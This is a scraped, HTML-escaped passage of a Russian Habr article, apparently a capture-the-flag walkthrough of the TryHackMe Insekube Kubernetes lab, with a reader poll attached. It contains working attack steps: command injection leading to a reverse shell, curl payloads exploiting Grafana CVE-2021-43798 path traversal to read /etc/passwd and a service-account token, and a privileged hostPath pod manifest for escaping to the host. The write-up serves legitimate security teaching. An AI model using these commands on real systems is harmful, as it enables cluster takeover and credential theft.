\u043f\u043e\u0437\u0432\u043e\u043b\u0438\u043b\u0438 \u0431\u044b \u0437\u0430\u043c\u0435\u0442\u0438\u0442\u044c \u0438 \u043e\u0441\u0442\u0430\u043d\u043e\u0432\u0438\u0442\u044c \u0437\u043b\u043e\u0443\u043c\u044b\u0448\u043b\u0435\u043d\u043d\u0438\u043a\u0430 \u0435\u0449\u0451 \u0432 \u043d\u0430\u0447\u0430\u043b\u0435 \u0430\u0442\u0430\u043a\u0438<\/p>\n<\/li>\n<\/ul>\n<\/div>\n<\/div>\n<\/div>\n<div class=\"v-portal\" style=\"display:none;\"><\/div>\n<\/div>\n<p> <!----> <\/p>\n<div class=\"tm-article-poll\">\n<div class=\"tm-notice tm-article-poll__notice tm-notice_positive\"><!----> <\/p>\n<div class=\"tm-notice__inner\"><!----> <\/p>\n<div class=\"tm-notice__content\"><span>\u0422\u043e\u043b\u044c\u043a\u043e \u0437\u0430\u0440\u0435\u0433\u0438\u0441\u0442\u0440\u0438\u0440\u043e\u0432\u0430\u043d\u043d\u044b\u0435 \u043f\u043e\u043b\u044c\u0437\u043e\u0432\u0430\u0442\u0435\u043b\u0438 \u043c\u043e\u0433\u0443\u0442 \u0443\u0447\u0430\u0441\u0442\u0432\u043e\u0432\u0430\u0442\u044c \u0432 \u043e\u043f\u0440\u043e\u0441\u0435. <a rel=\"nofollow\" href=\"\/kek\/v1\/auth\/habrahabr\/?back=\/ru\/post\/670172\/&#038;hl=ru\">\u0412\u043e\u0439\u0434\u0438\u0442\u0435<\/a>, \u043f\u043e\u0436\u0430\u043b\u0443\u0439\u0441\u0442\u0430.<\/span><\/div>\n<\/div>\n<\/div>\n<div class=\"tm-article-poll__header\">\u041f\u0440\u043e \u0447\u0442\u043e \u0440\u0430\u0441\u0441\u043a\u0430\u0437\u0430\u0442\u044c \u0432 \u0441\u043b\u0435\u0434\u0443\u044e\u0449\u0435\u0439 \u0441\u0442\u0430\u0442\u044c\u0435?<\/div>\n<div class=\"tm-article-poll__answers\">\n<div class=\"tm-article-poll__answer\">\n<div class=\"tm-article-poll__answer-data\"><span class=\"tm-article-poll__answer-percent tm-article-poll__answer-percent_winning\">             50%           <\/span> <span class=\"tm-article-poll__answer-label\">Network Polciy<\/span> <span class=\"tm-article-poll__answer-votes\">             6           <\/span><\/div>\n<div class=\"tm-article-poll__answer-bar\">\n<div class=\"tm-article-poll__answer-progress tm-article-poll__answer-progress_winning\" style=\"width:50%;\"><\/div>\n<\/div>\n<\/div>\n<div class=\"tm-article-poll__answer\">\n<div class=\"tm-article-poll__answer-data\"><span class=\"tm-article-poll__answer-percent\">             8.33%           <\/span> <span class=\"tm-article-poll__answer-label\">Policy engine<\/span> <span class=\"tm-article-poll__answer-votes\">             1           <\/span><\/div>\n<div class=\"tm-article-poll__answer-bar\">\n<div class=\"tm-article-poll__answer-progress\" style=\"width:8.33%;\"><\/div>\n<\/div>\n<\/div>\n<div class=\"tm-article-poll__answer\">\n<div class=\"tm-article-poll__answer-data\"><span class=\"tm-article-poll__answer-percent\">             25%           <\/span> <span class=\"tm-article-poll__answer-label\">Observability tools<\/span> <span class=\"tm-article-poll__answer-votes\">             3           <\/span><\/div>\n<div class=\"tm-article-poll__answer-bar\">\n<div class=\"tm-article-poll__answer-progress\" style=\"width:25%;\"><\/div>\n<\/div>\n<\/div>\n<div class=\"tm-article-poll__answer\">\n<div class=\"tm-article-poll__answer-data\"><span class=\"tm-article-poll__answer-percent\">             16.67%           <\/span> <span class=\"tm-article-poll__answer-label\">\u0421\u043a\u0430\u043d\u0435\u0440\u044b \u043d\u0430 \u0443\u044f\u0437\u0432\u0438\u043c\u043e\u0441\u0442\u0438<\/span> <span class=\"tm-article-poll__answer-votes\">             2           <\/span><\/div>\n<div class=\"tm-article-poll__answer-bar\">\n<div class=\"tm-article-poll__answer-progress\" style=\"width:16.67%;\"><\/div>\n<\/div>\n<\/div>\n<div class=\"tm-article-poll__answer\">\n<div class=\"tm-article-poll__answer-data\"><span class=\"tm-article-poll__answer-percent\">             0%           <\/span> <span class=\"tm-article-poll__answer-label\">Security tools<\/span> <span class=\"tm-article-poll__answer-votes\">             0           <\/span><\/div>\n<div class=\"tm-article-poll__answer-bar\">\n<div class=\"tm-article-poll__answer-progress\" style=\"width:0%;\"><\/div>\n<\/div>\n<\/div>\n<\/div>\n<div class=\"tm-article-poll__stats\">        \u041f\u0440\u043e\u0433\u043e\u043b\u043e\u0441\u043e\u0432\u0430\u043b\u0438 12 \u043f\u043e\u043b\u044c\u0437\u043e\u0432\u0430\u0442\u0435\u043b\u0435\u0439.          \u0412\u043e\u0437\u0434\u0435\u0440\u0436\u0430\u0432\u0448\u0438\u0445\u0441\u044f \u043d\u0435\u0442.      <\/div>\n<\/div>\n<p> \u0441\u0441\u044b\u043b\u043a\u0430 \u043d\u0430 \u043e\u0440\u0438\u0433\u0438\u043d\u0430\u043b \u0441\u0442\u0430\u0442\u044c\u0438 <a href=\"https:\/\/habr.com\/ru\/post\/670172\/\"> https:\/\/habr.com\/ru\/post\/670172\/<\/a><\/p>\n","protected":false},"excerpt":{"rendered":"<div><\/div>\n<div id=\"post-content-body\">\n<div>\n<div class=\"article-formatted-body article-formatted-body article-formatted-body_version-2\">\n<div xmlns=\"http:\/\/www.w3.org\/1999\/xhtml\">\n<p>\u0412\u0441\u0435\u043c \u043f\u0440\u0438\u0432\u0435\u0442! \u0412 \u044d\u0442\u043e\u0439 \u0441\u0442\u0430\u0442\u044c\u0435, \u043d\u0430 \u043f\u0440\u0438\u043c\u0435\u0440\u0435 \u043c\u0430\u0448\u0438\u043d\u044b Insekube \u0441 TryHackme, \u044f \u043f\u043e\u0441\u0442\u0430\u0440\u0430\u044e\u0441\u044c \u043f\u043e\u043a\u0430\u0437\u0430\u0442\u044c \u043a\u0430\u043a\u0438\u043c \u043e\u0431\u0440\u0430\u0437\u043e\u043c \u043c\u043e\u0433\u0443\u0442 \u0431\u044b\u0442\u044c \u0437\u0430\u0445\u0432\u0430\u0447\u0435\u043d\u044b \u043a\u043b\u0430\u0441\u0442\u0435\u0440\u0430 Kubernetes \u0440\u0435\u0430\u043b\u044c\u043d\u044b\u043c\u0438 \u0437\u043b\u043e\u0443\u043c\u044b\u0448\u043b\u0435\u043d\u043d\u0438\u043a\u0430\u043c\u0438, \u0430 \u0442\u0430\u043a\u0436\u0435 \u0440\u0430\u0441\u0441\u043c\u043e\u0442\u0440\u044e \u0432\u043e\u0437\u043c\u043e\u0436\u043d\u044b\u0435 \u043c\u0435\u0442\u043e\u0434\u044b \u0437\u0430\u0449\u0438\u0442\u044b \u043e\u0442 \u044d\u0442\u043e\u0433\u043e. \u041f\u0440\u0438\u044f\u0442\u043d\u043e\u0433\u043e \u043f\u0440\u043e\u0447\u0442\u0435\u043d\u0438\u044f!<\/p>\n<h2>\u0418\u0449\u0435\u043c \u0442\u043e\u0447\u043a\u0443 \u0432\u0445\u043e\u0434\u0430<\/h2>\n<p>\u0420\u0430\u0441\u0447\u0435\u0445\u043b\u044f\u0435\u043c nmap:<\/p>\n<pre><code class=\"bash\">nmap 10.10.221.142  Starting Nmap 7.60 ( https:\/\/nmap.org ) at 2022-06-07 17:08 BST Nmap scan report for ip-10-10-221-142.eu-west-1.compute.internal (10.10.221.142) Host is up (0.0015s latency). Not shown: 998 closed ports PORT   STATE SERVICE 22\/tcp open  ssh 80\/tcp open  http MAC Address: 02:BF:D5:06:FF:D9 (Unknown)  Nmap done: 1 IP address (1 host up) scanned in 1.59 seconds<\/code><\/pre>\n<p>\u041e\u043f\u0438\u0440\u0430\u044f\u0441\u044c \u043d\u0430 \u043d\u0430\u0437\u0432\u0430\u043d\u0438\u0435 \u0438 \u043e\u043f\u0438\u0441\u0430\u043d\u0438\u0435 \u0442\u0430\u0447\u043a\u0438 \u0445\u043e\u0442\u0435\u043b\u043e\u0441\u044c \u0431\u044b \u0443\u0432\u0438\u0434\u0435\u0442\u044c \u043a\u0430\u043a\u0438\u0435-\u043d\u0438\u0431\u0443\u0434\u044c \u043f\u043e\u0440\u0442\u044b Kubernetes, \u043d\u043e \u0432\u0438\u0434\u0438\u043c \u0442\u043e\u0440\u0447\u0430\u0449\u0438\u0439 \u043d\u0430\u0440\u0443\u0436\u0443 80 \u043f\u043e\u0440\u0442. \u041e\u043a\u0435\u0439, \u043e\u0442\u043a\u0440\u044b\u0432\u0430\u0435\u043c \u0430\u0434\u0440\u0435\u0441 \u0432 \u0431\u0440\u0430\u0443\u0437\u0435\u0440\u0435.<\/p>\n<figure class=\"full-width\"><figcaption><\/figcaption><\/figure>\n<p>\u041f\u0440\u043e\u0431\u0443\u0435\u043c \u043f\u043e\u0434\u0430\u0442\u044c \u043a\u0430\u043a\u043e\u0439-\u043d\u0438\u0431\u0443\u0434\u044c \u0438\u043d\u043f\u0443\u0442 \u0438 \u043f\u043e\u043d\u0438\u043c\u0430\u0435\u043c, \u0447\u0442\u043e \u044d\u0442\u043e \u043e\u0431\u044b\u0447\u043d\u044b\u0439 ping.<\/p>\n<figure class=\"full-width\"><figcaption><\/figcaption><\/figure>\n<p>\u0421\u0443\u0434\u044f \u043f\u043e \u043e\u0442\u0432\u0435\u0442\u0443, \u0433\u0434\u0435-\u0442\u043e \u0438\u0441\u043f\u043e\u043b\u043d\u044f\u0435\u0442\u0441\u044f \u0440\u0435\u0430\u043b\u043d\u0430\u044f \u0442\u0443\u043b\u0437\u0430 ping. \u0422\u0443\u0442 \u0436\u0435 \u043f\u0440\u0438\u0445\u043e\u0434\u0438\u0442 \u0438\u0434\u0435\u044f \u043f\u0440\u043e\u0432\u0435\u0440\u0438\u0442\u044c \u0432\u0432\u043e\u0434 \u043d\u0430 <code>command injection<\/code> \u2013 \u0434\u0435\u0439\u0441\u0442\u0432\u0438\u0442\u0435\u043b\u044c\u043d\u043e \u0440\u0430\u0431\u043e\u0442\u0430\u0435\u0442!<\/p>\n<figure class=\"full-width\"><figcaption><\/figcaption><\/figure>\n<p>\u041d\u0435\u0434\u043e\u043b\u0433\u043e \u0434\u0443\u043c\u0430\u044f, \u043f\u0440\u043e\u043a\u0438\u0434\u044b\u0432\u0430\u0435\u043c reverse shell \u0438 \u043b\u043e\u0432\u0438\u043c \u0431\u044d\u043a-\u043a\u043e\u043d\u043d\u0435\u043a\u0442:<\/p>\n<figure class=\"full-width\"><figcaption><\/figcaption><\/figure>\n<pre><code class=\"bash\">nc -nlvp 4444 Listening on [0.0.0.0] (family 0, port 4444) Connection from 10.10.221.142 57278 received! \/bin\/sh: 0: can't access tty; job control turned off $ id     uid=1000(challenge) gid=1000(challenge) groups=1000(challenge)<\/code><\/pre>\n<h2>\u0412\u043d\u0443\u0442\u0440\u0438 \u043a\u043e\u043d\u0442\u0435\u0439\u043d\u0435\u0440\u0430<\/h2>\n<p>\u041e\u0442\u043b\u0438\u0447\u043d\u043e, \u043c\u044b \u0432\u043d\u0443\u0442\u0440\u0438. \u0422\u043e\u043b\u044c\u043a\u043e \u0432\u043e\u0442 \u0432\u043d\u0443\u0442\u0440\u0438 \u0447\u0435\u0433\u043e? \u041f\u043e\u0441\u043c\u043e\u0442\u0440\u0438\u043c \u043f\u0435\u0440\u0435\u043c\u0435\u043d\u043d\u044b\u0435 \u043e\u043a\u0440\u0443\u0436\u0435\u043d\u0438\u044f. \u0412\u0438\u0434\u0438\u043c \u0445\u043e\u0440\u043e\u0448\u043e \u0437\u043d\u0430\u043a\u043e\u043c\u044b\u0435 \u0437\u043d\u0430\u0447\u0435\u043d\u0438\u044f \u0434\u043b\u044f Kubernetes \u2013 \u043e\u0442\u0441\u044e\u0434\u0430 \u0434\u0435\u043b\u0430\u0435\u043c \u0432\u044b\u0432\u043e\u0434: \u043c\u044b \u0432\u043d\u0443\u0442\u0440\u0438 Pod! \u0418\u0437 <strong>env<\/strong> \u0437\u0430\u0431\u0438\u0440\u0430\u0435\u043c \u043f\u0435\u0440\u0432\u044b\u0439 \u0444\u043b\u0430\u0433.<\/p>\n<pre><code class=\"bash\">$ env KUBERNETES_SERVICE_PORT=443 KUBERNETES_PORT=tcp:\/\/10.96.0.1:443 HOSTNAME=syringe-79b66d66d7-7mxhd ...<\/code><\/pre>\n<p>\u0412\u043d\u0443\u0442\u0440\u0438 \u0441\u0430\u043c\u043e\u0433\u043e Pod \u0434\u043b\u044f \u043d\u0430\u0441 \u043c\u0430\u043b\u043e \u0447\u0435\u0433\u043e \u0438\u043d\u0442\u0435\u0440\u0435\u0441\u043d\u043e\u0433\u043e, \u043d\u043e \u0443 \u043d\u0435\u0433\u043e \u043c\u043e\u0436\u0435\u0442 \u0431\u044b\u0442\u044c \u043f\u0440\u0438\u0432\u0438\u043b\u0435\u0433\u0438\u0440\u043e\u0432\u0430\u043d\u043d\u044b\u0439 Service Account, \u043a\u043e\u0442\u043e\u0440\u044b\u0439 \u043c\u043e\u0436\u0435\u0442 \u0434\u0430\u0442\u044c \u043d\u0430\u043c \u0431\u043e\u043b\u044c\u0448\u0435 \u0432\u043e\u0437\u043c\u043e\u0436\u043d\u043e\u0441\u0442\u0435\u0439 \u2013 \u043d\u0430\u043f\u0440\u0438\u043c\u0435\u0440 \u0441\u043e\u0437\u0434\u0430\u0432\u0430\u0442\u044c \u0442\u0430\u043a\u0438\u0435 Pod, \u0447\u0442\u043e\u0431\u044b \u043c\u043e\u0436\u043d\u043e \u0431\u044b\u043b\u043e \u0441\u0434\u0435\u043b\u0430\u0442\u044c \u043f\u043e\u0431\u0435\u0433 \u0438\u0437 \u043a\u043e\u043d\u0442\u0435\u0439\u043d\u0435\u0440\u0430 \u0438 \u0432\u044b\u0440\u0432\u0430\u0442\u044c\u0441\u044f \u043d\u0430 \u0445\u043e\u0441\u0442.  \u0414\u043b\u044f \u0442\u043e\u0433\u043e \u0447\u0442\u043e\u0431\u044b \u044d\u0442\u043e \u043f\u0440\u043e\u0432\u0435\u0440\u0438\u0442\u044c \u043d\u0430\u043c \u043d\u0443\u0436\u0435\u043d <code>kubectl<\/code>. \u041f\u043e\u0441\u043c\u043e\u0442\u0440\u0438\u043c, \u0435\u0441\u0442\u044c \u043b\u0438 \u043e\u043d \u0433\u0434\u0435 \u043d\u0438\u0431\u0443\u0434\u044c \u0432 \u043a\u043e\u043d\u0442\u0435\u0439\u043d\u0435\u0440\u0435, \u0432\u0434\u0440\u0443\u0433 \u043d\u0435 \u043f\u0440\u0438\u0434\u0435\u0442\u0441\u044f \u0435\u0433\u043e \u0441\u043a\u0430\u0447\u0438\u0432\u0430\u0442\u044c \u0435\u0433\u043e \u0438\u0437\u0432\u043d\u0435.<\/p>\n<pre><code class=\"bash\">find \/ -name \"kubectl\" find: '\/etc\/ssl\/private': Permission denied find: '\/var\/lib\/apt\/lists\/partial': Permission denied find: '\/var\/cache\/apt\/archives\/partial': Permission denied find: '\/var\/cache\/ldconfig': Permission denied find: '\/proc\/tty\/driver': Permission denied \/tmp\/kubectl<\/code><\/pre>\n<p>\u041e\u0442\u043b\u0438\u0447\u043d\u043e! \u0422\u043e \u0447\u0442\u043e \u043d\u0430\u043c \u043d\u0443\u0436\u043d\u043e. \u041a\u0442\u043e-\u0442\u043e \u0431\u0435\u0440\u0435\u0436\u043d\u043e \u043e\u0441\u0442\u0430\u0432\u0438\u043b <strong>kubectl<\/strong> \u0434\u043b\u044f \u043d\u0430\u0441 \u0432 \u0434\u0438\u0440\u0435\u043a\u0442\u043e\u0440\u0438\u0438 <code>\/tmp <\/code>\u041f\u0440\u043e\u0432\u0435\u0440\u0438\u043c, \u0434\u043e\u0441\u0442\u0430\u0442\u043e\u0447\u043d\u043e \u043b\u0438 \u0443 \u043d\u0430\u0441 \u043f\u0440\u0430\u0432 \u0434\u043b\u044f \u0441\u043e\u0437\u0434\u0430\u043d\u0438\u044f \u043d\u043e\u0432\u043e\u0433\u043e Pod:<\/p>\n<pre><code class=\"bash\">$ cd \/tmp $ ls kubectl $ .\/kubectl auth can-i create pods no<\/code><\/pre>\n<p>\u0414\u0430 \u0443\u0436, \u043d\u0435 \u0433\u0443\u0441\u0442\u043e. \u041d\u043e \u0441\u043c\u043e\u0442\u0440\u0435\u0442\u044c Secrets \u043c\u044b \u043c\u043e\u0436\u0435\u043c. \u0422\u0430\u043c \u0436\u0435 \u043b\u0435\u0436\u0438\u0442 \u0432\u0442\u043e\u0440\u043e\u0439 \u0444\u043b\u0430\u0433. \u0411\u0443\u0434\u0435\u043c \u0438\u0441\u043a\u0430\u0442\u044c \u0434\u0440\u0443\u0433\u043e\u0439 \u0432\u0435\u043a\u0442\u043e\u0440.<\/p>\n<pre><code class=\"bash\">$ .\/kubectl get secrets NAME                    TYPE                                  DATA default-token-8bksk     kubernetes.io\/service-account-token   3 developer-token-74lck   kubernetes.io\/service-account-token   3 secretflag              Opaque                                1 syringe-token-g85mg     kubernetes.io\/service-account-token   3<\/code><\/pre>\n<p>\u041e\u0441\u043e\u0431\u043e \u0432\u043d\u0438\u043c\u0430\u0442\u0435\u043b\u044c\u043d\u044b\u0435, \u043f\u0440\u0438 \u043f\u0440\u043e\u0441\u043c\u043e\u0442\u0440\u0435 <strong>env,<\/strong> \u0443\u0432\u0438\u0434\u0435\u043b\u0438, \u0447\u0442\u043e \u0442\u0430\u043c \u0442\u0430\u043a\u0436\u0435 \u0445\u0440\u0430\u043d\u044f\u0442\u0441\u044f \u043f\u0435\u0440\u0435\u043c\u0435\u043d\u043d\u044b\u0435 \u043e\u0442 Grafana \u2013 \u0430\u0434\u0440\u0435\u0441 \u0438 \u043f\u043e\u0440\u0442. \u042d\u0442\u043e \u0437\u043d\u0430\u0447\u0438\u0442, \u0447\u0442\u043e \u043e\u043d\u0430 \u0440\u0430\u0437\u0432\u0435\u0440\u043d\u0443\u0442\u0430 \u0432 \u043a\u043b\u0430\u0441\u0442\u0435\u0440\u0435 \u0438 \u043c\u044b \u043c\u043e\u0436\u0435\u043c \u043f\u043e\u043f\u0440\u043e\u0431\u043e\u0432\u0430\u0442\u044c \u0434\u043e\u0441\u0442\u0443\u0447\u0430\u0442\u044c\u0441\u044f \u0434\u043e \u043d\u0435\u0451 \u0438\u0437 Pod! \u0412 \u043a\u043e\u043d\u0442\u0435\u0439\u043d\u0435\u0440\u0435 \u0442\u0430\u043a\u0436\u0435 \u0435\u0441\u0442\u044c curl, \u043a\u043e\u0442\u043e\u0440\u044b\u0439 \u043e\u0431\u043b\u0435\u0433\u0447\u0438\u0442 \u043d\u0430\u043c \u044d\u0442\u0443 \u0437\u0430\u0434\u0430\u0447\u0443. \u041f\u0440\u043e\u0431\u0443\u0435\u043c \u043f\u043e\u0441\u0442\u0443\u0447\u0430\u0442\u044c\u0441\u044f \u043d\u0430 \u0441\u0442\u0430\u043d\u0434\u0430\u0440\u0442\u043d\u044b\u0439 \u044d\u043d\u0434\u043f\u043e\u0438\u043d\u0442 Grafana:<\/p>\n<pre><code class=\"bash\">curl 10.108.133.228:3000\/login<\/code><\/pre>\n<p>\u041f\u043e\u043b\u0443\u0447\u0430\u0435\u043c \u0434\u043e\u0432\u043e\u043b\u044c\u043d\u043e \u0431\u043e\u043b\u044c\u0448\u043e\u0439 \u043e\u0442\u0432\u0435\u0442&#8230; \u0414\u043b\u044f \u043d\u0430\u0447\u0430\u043b\u0430 \u043d\u0435\u043f\u043b\u043e\u0445\u043e \u0431\u044b\u043b\u043e \u0431\u044b \u043e\u043f\u0440\u0435\u0434\u0435\u043b\u0438\u0442\u044c \u0432\u0435\u0440\u0441\u0438\u044e Grafana, \u043c\u043e\u0436\u0435\u0442 \u043e\u043d\u0430 \u0443\u0441\u0442\u0430\u0440\u0435\u0432\u0448\u0430\u044f \u0438 \u0434\u043b\u044f \u043d\u0435\u0451 \u0435\u0441\u0442\u044c \u0438\u0437\u0432\u0435\u0441\u0442\u043d\u044b\u0435 \u0443\u044f\u0437\u0432\u0438\u043c\u043e\u0441\u0442\u0438. \u0412 \u043d\u0430\u0447\u0430\u043b\u0435 \u043e\u0442\u0432\u0435\u0442\u0430 \u0432\u0438\u0434\u0438\u043c \u0443\u043f\u043e\u043c\u0438\u043d\u0430\u043d\u0438\u0435 \u0432\u0435\u0440\u0441\u0438\u0438:<\/p>\n<pre><code class=\"bash\">...\"version\":\"8.3.0-beta2\"...<\/code><\/pre>\n<p>\u041f\u043e \u043f\u0435\u0440\u0432\u043e\u0439 \u0441\u0441\u044b\u043b\u043a\u0435 \u0432 \u0433\u0443\u0433\u043b\u0435 \u043d\u0430\u0445\u043e\u0434\u0438\u043c, \u0447\u0442\u043e \u0434\u043b\u044f \u044d\u0442\u043e\u0439 \u0432\u0435\u0440\u0441\u0438\u0438 \u043f\u0440\u0438\u0441\u0432\u043e\u0435\u043d\u0430 CVE-2021-43798 \u2013 <em>Grafana 8.x Path Traversal (Pre-Auth)<\/em>. \u0421\u0443\u043f\u0435\u0440! \u041a\u0430\u043a \u043d\u0430\u043c \u044d\u0442\u043e \u043c\u043e\u0436\u0435\u0442 \u0431\u044b\u0442\u044c \u043f\u043e\u043b\u0435\u0437\u043d\u043e? \u041c\u044b \u0441\u043c\u043e\u0436\u0435\u043c \u043f\u0440\u043e\u0447\u0438\u0442\u0430\u0442\u044c Token, \u043a\u043e\u0442\u043e\u0440\u044b\u0439 \u043e\u0442\u043d\u043e\u0441\u0438\u0442\u0441\u044f \u043a Service Account \u0443 Grafana Pod \u2013 \u043e\u043d \u043c\u0430\u0443\u043d\u0442\u0438\u0442\u0441\u044f \u043f\u0440\u044f\u043c\u043e \u0432\u043d\u0443\u0442\u0440\u044c \u043a\u043e\u043d\u0442\u0435\u0439\u043d\u0435\u0440\u0430. \u0415\u0441\u043b\u0438 \u0443 \u044d\u0442\u043e\u0433\u043e Pod \u0435\u0441\u0442\u044c \u0434\u043e\u0441\u0442\u0430\u0442\u043e\u0447\u043d\u043e \u043f\u0440\u0438\u0432\u0438\u043b\u0435\u0433\u0438\u0440\u043e\u0432\u0430\u043d\u043d\u044b\u0439 Service Account, \u0442\u043e \u043c\u044b \u0441\u043c\u043e\u0436\u0435\u043c \u0441\u043e\u0437\u0434\u0430\u0442\u044c &#171;Bad Pod&#187; \u0434\u043b\u044f \u043f\u043e\u0431\u0435\u0433\u0430 \u043d\u0430 \u0445\u043e\u0441\u0442!<\/p>\n<p>\u0424\u043e\u0440\u043c\u0438\u0440\u0443\u0435\u043c \u0437\u0430\u043f\u0440\u043e\u0441 \u0441 \u043f\u043e\u043b\u0435\u0437\u043d\u043e\u0439 \u043d\u0430\u0433\u0440\u0443\u0437\u043a\u043e\u0439, \u0442\u0430\u043a\u0438\u043c \u043e\u0431\u0440\u0430\u0437\u043e\u043c \u0447\u0442\u043e\u0431\u044b \u043e\u0442\u0440\u0430\u0431\u043e\u0442\u0430\u043b path traversal. \u041d\u0435 \u0437\u0430\u0431\u044b\u0432\u0430\u0435\u043c \u0432\u044b\u0441\u0442\u0430\u0432\u0438\u0442\u044c \u0444\u043b\u0430\u0433 <code>--path-as-is<\/code>, \u0447\u0442\u043e\u0431\u044b curl \u043d\u0435 \u0441\u0445\u043b\u043e\u043f\u044b\u0432\u0430\u043b \u043d\u0430\u0448 \u043f\u044d\u0439\u043b\u043e\u0430\u0434:<\/p>\n<pre><code class=\"bash\">curl --path-as-is 10.108.133.228:3000\/public\/plugins\/alertGroups\/..\/..\/..\/..\/..\/..\/..\/..\/etc\/passwd   % Total    % Received % Xferd  Average Speed   Time    Time     Time  Current                                  Dload  Upload   Total   Spent    Left  Speed 100  1230  100  1230    0     0   600k      0 --:--:-- --:--:-- --:--:--  600k root:x:0:0:root:\/root:\/bin\/ash bin:x:1:1:bin:\/bin:\/sbin\/nologin ...<\/code><\/pre>\n<p>\u0420\u0430\u0431\u043e\u0442\u0430\u0435\u0442! \u0422\u0435\u043f\u0435\u0440\u044c \u0443\u043a\u0430\u0437\u044b\u0432\u0430\u0435\u043c \u043f\u0443\u0442\u044c \u0434\u043e Token (\u043e\u043d \u043b\u0435\u0436\u0438\u0442 \u0432 <code>\/var\/run\/secrets\/kubernetes.io\/serviceaccount\/token<\/code>) \u0438 \u0441\u043e\u0445\u0440\u0430\u043d\u044f\u0435\u043c \u043e\u0442\u0432\u0435\u0442:<\/p>\n<pre><code class=\"bash\">curl --path-as-is 10.108.133.228:3000\/public\/plugins\/alertGroups\/..\/..\/..\/..\/..\/..\/..\/..\/var\/run\/secrets\/kubernetes.io\/serviceaccount\/token   % Total    % Received % Xferd  Average Speed   Time    Time     Time  Current                                  Dload  Upload   Total   Spent    Left  Speed 100  1022  100  1022    0     0   499k      0 --:--:-- --:--:-- --:--:--  499k eyJhbGciOiJSUzI1NiIsImtpZCI6Im82QU1WNV9qNEIwYlV3YnBGb1NXQ25UeUtmVzNZZXZQZjhPZUtUb21jcjQifQ.eyJhdWQiOlsiaHR0cHM6Ly9rdWJlcm5ldGVzLmRlZmF1bHQuc3ZjLmNsdXN0ZXIubG9jYWwiXSwiZXhwIjoxNjg2MTU5NjAzLCJpYXQiOjE2NTQ2MjM2MDMsImlzcyI6Imh0dHBzOi8va3ViZXJuZXRlcy5kZWZhdWx0LnN2Yy5jbHVzdGVyLmxvY2FsIiwia3ViZX<\/code><\/pre>\n<pre><code class=\"bash\">export TOKEN=eyJhbGciOiJSUzI1NiIsImtpZCI6Im82QU1WNV9qNEIwYlV3YnBGb1NXQ25UeUtmVzNZZXZQZjhPZUt...<\/code><\/pre>\n<p>\u0415\u0449\u0451 \u0440\u0430\u0437 \u043f\u0440\u043e\u0432\u0435\u0440\u0438\u043c \u0432\u043e\u0437\u043c\u043e\u0436\u043d\u043e\u0441\u0442\u044c \u0441\u043e\u0437\u0434\u0430\u0432\u0430\u0442\u044c Pod, \u043d\u0430 \u044d\u0442\u043e\u0442 \u0440\u0430\u0437 \u0447\u0435\u0440\u0435\u0437 \u043d\u043e\u0432\u044b\u0439 Service Account:<\/p>\n<pre><code class=\"bash\">$ .\/kubectl auth can-i create pods --token=$TOKEN yes<\/code><\/pre>\n<p>\u041e\u0442\u043b\u0438\u0447\u043d\u043e. \u0421\u043e\u0437\u0434\u0430\u0435\u043c &#171;Bad Pod&#187; \u0434\u043b\u044f \u043f\u043e\u0431\u0435\u0433\u0430 \u043d\u0430 \u0445\u043e\u0441\u0442:<\/p>\n<pre><code class=\"bash\">cat &lt;&lt;EOF | .\/kubectl create --token=$TOKEN -f - apiVersion: v1 kind: Pod metadata:   name: everything-allowed-exec-pod   labels:     app: pentest spec:   hostNetwork: true   hostPID: true   hostIPC: true   containers:   - name: everything-allowed-pod     image: ubuntu     securityContext:       privileged: true     volumeMounts:     - mountPath: \/host       name: noderoot     command: [ \"\/bin\/sh\", \"-c\", \"--\" ]     args: [ \"while true; do sleep 30; done;\" ]   volumes:   - name: noderoot     hostPath:       path: \/ EOF<\/code><\/pre>\n<p>\u041f\u043e\u0441\u043c\u043e\u0442\u0440\u0438\u043c, \u0441\u043e\u0437\u0434\u0430\u043b\u0441\u044f \u043b\u0438 Pod:<\/p>\n<pre><code class=\"bash\">$ .\/kubectl get po --token=$TOKEN NAME                          READY   STATUS         RESTARTS        AGE everything-allowed-exec-pod   0\/1     ErrImagePull   0               29s grafana-57454c95cb-v4nrk      1\/1     Running        10 (127d ago)   151d syringe-79b66d66d7-7mxhd      1\/1     Running        1 (127d ago)    127d<\/code><\/pre>\n<p>\u041d\u043e \u043d\u0435 \u0432\u0441\u0451 \u0442\u0430\u043a \u043f\u0440\u043e\u0441\u0442\u043e! Pod \u043d\u0435 \u0437\u0430\u043f\u0443\u0441\u0442\u0438\u043b\u0441\u044f \u2013 \u043d\u0435 \u0441\u043f\u0443\u043b\u043b\u0438\u043b\u0441\u044f \u043e\u0431\u0440\u0430\u0437. \u0412\u0438\u0434\u0438\u043c\u043e \u043a\u043b\u0430\u0441\u0442\u0435\u0440 \u0438\u0437\u043e\u043b\u0438\u0440\u043e\u0432\u0430\u043d \u043f\u043e \u0441\u0435\u0442\u0438. \u041d\u043e \u0435\u0441\u043b\u0438 \u043e\u0431\u0440\u0430\u0437 \u0443\u0436\u0435 \u0440\u0430\u043d\u0435\u0435 \u0438\u0441\u043f\u043e\u043b\u044c\u0437\u043e\u0432\u0430\u043b\u0441\u044f \u0438 \u0441\u043a\u0430\u0447\u0438\u0432\u0430\u043b\u0441\u044f, \u0442\u043e \u043c\u044b \u043c\u043e\u0436\u0435\u043c \u043f\u043e\u043f\u044b\u0442\u0430\u0442\u044c \u0443\u0434\u0430\u0447\u0443 \u0438 \u0432\u044b\u0441\u0442\u0430\u0432\u0438\u0442\u044c <code>imagePullPolicy: IfNotPresent<\/code><\/p>\n<pre><code>... containers:   - name: everything-allowed-pod     image: ubuntu     imagePullPolicy: IfNotPresent ...<\/code><\/pre>\n<p>\u041d\u0430 \u044d\u0442\u043e\u0442 \u0440\u0430\u0437 \u0441\u0440\u0430\u0431\u043e\u0442\u0430\u043b\u043e. \u0417\u0430\u0445\u043e\u0434\u0438\u043c \u0432 Pod \u2013> \u043e\u043a\u0430\u0437\u044b\u0432\u0430\u0435\u043c\u0441\u044f \u043d\u0430 \u0445\u043e\u0441\u0442\u0435 \u2013> \u043d\u0430\u0445\u043e\u0434\u0438\u043c \u043f\u043e\u0441\u043b\u0435\u0434\u043d\u0438\u0439 \u0444\u043b\u0430\u0433:<\/p>\n<pre><code class=\"bash\">$ .\/kubectl get po --token=$TOKEN NAME                          READY   STATUS    RESTARTS        AGE everything-allowed-exec-pod   1\/1     Running   0               12s grafana-57454c95cb-v4nrk      1\/1     Running   10 (127d ago)   151d syringe-79b66d66d7-7mxhd      1\/1     Running   1 (127d ago)    127d $ .\/kubectl exec -it everything-allowed-exec-pod --token=$TOKEN -- bash Unable to use a TTY - input is not a terminal or the 